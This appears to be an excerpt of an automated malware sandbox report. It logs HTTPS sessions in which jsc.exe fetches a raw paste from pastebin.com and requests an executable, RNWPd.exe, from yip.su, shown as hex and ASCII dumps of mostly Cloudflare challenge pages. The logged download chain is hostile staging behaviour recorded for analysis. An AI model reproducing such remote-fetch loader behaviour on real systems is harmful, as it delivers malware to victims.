                                    Data Ascii: cf-chl-out: Z33ZsxiCcUmZSiTRrAANxSFwhllQhgy88S7F1+RFDGmuBqi6/iiX1fGqJFalF6fPauEaYGV4xs6PZWSGYzEHKfqF395OdVxx3adj0gTbuPE=$A8l+XCi94CeiejJKIs1YYg==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:10:31 UTC1369INData Raw: 33 64 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3dfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:10:31 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:10:31 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:10:31 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:10:31 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:10:31 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:10:31 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:10:31 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 33 30 39 38 35 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 65 61 31 31 61 66 31 30 63 39 63 27 2c 63 48 61 73 68 3a 20 27 32 32 61 35 34 33 31 37 61 39 38 64 38 33 32 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 56 69 44 44 51 4a 65 62 76 39 58 33 49 71 55 6e 4e 79 45 50 4a 4c 73 41 56 47 62 47 6e 54 57 2e 42 77 6a 50 6b 51 32 71 72 33 63 2d 31 37 32 33 39 33 32 36 33 31 2d 30 2e 30 2e 31 2e 31 2d 34 31 33 37 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '30985',cRay: '8b4cfea11af10c9c',cHash: '22a54317a98d832',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=ViDDQJebv9X3IqUnNyEPJLsAVGbGnTW.BwjPkQ2qr3c-1723932631-0.0.1.1-4137",cFPWv: 'g',cTTim
                                    2024-08-17 22:10:31 UTC1369INData Raw: 4e 6e 6b 76 63 79 6a 31 66 38 4c 70 42 4f 67 78 49 57 4c 64 49 47 4c 33 56 47 7a 6a 75 64 41 6c 47 30 42 4b 6e 67 52 56 70 6a 34 77 46 49 48 79 4d 61 4d 36 55 34 59 43 51 49 4d 6c 54 6e 37 73 37 4e 51 6e 66 61 42 30 4a 4f 33 69 78 43 44 2e 36 35 48 65 54 45 4e 39 6a 59 58 71 4c 56 39 5f 71 70 6a 79 33 63 38 34 78 7a 45 54 38 63 70 35 71 41 51 6f 51 69 4e 41 50 6f 33 6e 7a 53 58 6d 52 79 66 53 76 6c 69 34 53 48 62 4f 44 79 75 41 41 68 51 63 66 65 73 4f 56 34 45 70 65 64 42 76 4c 38 61 77 57 56 54 43 6d 5a 6a 39 2e 47 45 35 65 4f 33 58 70 32 7a 61 52 54 62 64 77 79 76 78 6b 53 54 50 58 44 65 4c 51 46 30 6a 49 66 74 48 34 6f 71 70 30 39 61 48 33 37 51 2e 5f 74 77 44 5f 5a 61 2e 48 57 78 4f 34 33 6f 30 53 4f 36 4b 79 43 50 30 5a 6e 6b 4a 35 43 30 62 70 31 53
                                    Data Ascii: Nnkvcyj1f8LpBOgxIWLdIGL3VGzjudAlG0BKngRVpj4wFIHyMaM6U4YCQIMlTn7s7NQnfaB0JO3ixCD.65HeTEN9jYXqLV9_qpjy3c84xzET8cp5qAQoQiNAPo3nzSXmRyfSvli4SHbODyuAAhQcfesOV4EpedBvL8awWVTCmZj9.GE5eO3Xp2zaRTbdwyvxkSTPXDeLQF0jIftH4oqp09aH37Q._twD_Za.HWxO43o0SO6KyCP0ZnkJ5C0bp1S


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    52192.168.2.549778104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:10:36 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:10:36 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:10:36 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfec15e977287-EWR
                                    2024-08-17 22:10:36 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:10:36 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:10:36 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:10:36 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:10:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    53192.168.2.549779188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:10:36 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:10:37 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:10:37 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:10:37 UTC685INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 63 4d 52 62 38 61 57 41 45 43 7a 32 36 4e 33 50 33 49 61 77 6e 72 47 4e 51 36 53 32 45 6c 66 37 46 4d 6f 39 47 57 44 39 6f 30 67 76 59 6a 79 38 6d 79 56 66 41 44 6f 37 2b 56 69 49 70 59 71 33 4e 6b 57 5a 43 38 76 32 53 70 4e 50 37 53 48 31 59 2f 37 31 58 41 71 6e 6c 75 6b 73 55 4b 57 61 49 36 72 79 48 6a 38 72 4a 66 73 3d 24 61 43 66 77 72 72 6f 4c 54 75 4d 2f 48 41 43 59 75 52 66 56 48 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: cMRb8aWAECz26N3P3IawnrGNQ6S2Elf7FMo9GWD9o0gvYjy8myVfADo7+ViIpYq3NkWZC8v2SpNP7SH1Y/71XAqnluksUKWaI6ryHj8rJfs=$aCfwrroLTuM/HACYuRfVHA==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:10:37 UTC1369INData Raw: 33 64 65 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3de7<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:10:37 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:10:37 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
